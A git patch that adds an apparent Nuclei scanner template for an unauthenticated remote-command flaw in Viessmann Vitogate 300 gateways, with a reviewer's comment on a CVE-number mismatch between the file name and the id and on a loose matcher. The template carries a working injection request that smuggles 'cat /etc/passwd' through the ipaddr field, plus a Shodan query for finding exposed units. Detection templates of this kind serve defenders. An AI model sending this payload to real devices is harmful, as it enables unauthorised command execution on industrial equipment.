From 1f0c821f5db19148da93ed236a7cf1004fd7744c Mon Sep 17 00:00:00 2001
From: Rahul Maini
Date: Fri, 20 Oct 2023 17:47:42 +0400
Subject: [PATCH] Added CVE-2023-4582 Vitogate 300 RCE
---
http/cves/2023/CVE-2023-4582.yaml | 51 +++++++++++++++++++++++++++++++
1 file changed, 51 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-4582.yaml
diff --git a/http/cves/2023/CVE-2023-4582.yaml b/http/cves/2023/CVE-2023-4582.yaml
new file mode 100644
index 0000000000..bba0c7394f
--- /dev/null
+++ b/http/cves/2023/CVE-2023-4582.yaml
@@ -0,0 +1,51 @@
+id: CVE-2023-45852
+info:
+ name: Viessmann Vitogate 300 - Unauthenticated Remote Code Execution
+ author: iamnoooob, rootxharsh, pdresearch
+ severity: critical
+ description: |
+ In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.
+ reference:
+ - https://connectivity.viessmann.com/gb/mp-fp/vitogate/vitogate-300-bn-mb.html
+ - https://github.com/Push3AX/vul/blob/main/viessmann/Vitogate300_RCE.md
+ tags: rce,vitogate
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-45852
+ cwe-id: CWE-77
+ cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: Viessmann
+ shodan-query: title="Vitogate 300"
+
+variables:
+ marker: "{{randstr}}"
+
+http:
+ - raw:
+ - |
+ POST /cgi-bin/vitogate.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"{{marker}};cat /etc/passwd"}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'traceroute: {{marker}}: Unknown host'
+ - 'daemon:x:1:1:'
+
+ - type: word
+ part: header
+ words:
+ - 'Content-Type: application/json'
+
+ - type: status
+ status:
+ - 200
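Review bot: The template's `id: CVE-2023-45852` and `cve-id: CVE-2023-45852` do not agree with the file path `http/cves/2023/CVE-2023-4582.yaml` (and the commit subject), so the identifier in findings and the identifier used to locate the template will differ; one of the two should be corrected once the CVE record is confirmed, most likely by renaming the file to match `id`, since the repository's template checks key on that value. The first body matcher lists two `words` without a `condition`, and the default for `words` is `or`, so the `traceroute: {{marker}}: Unknown host` echo on its own, which only shows the value reached the traceroute call and can appear on an input-sanitised build, is enough to report the host; adding `condition: and` under that matcher ties the verdict to the second string and avoids that false positive. The `description` block scalar also ends with a `|` that keeps a trailing newline; `|-` is the usual form for this field.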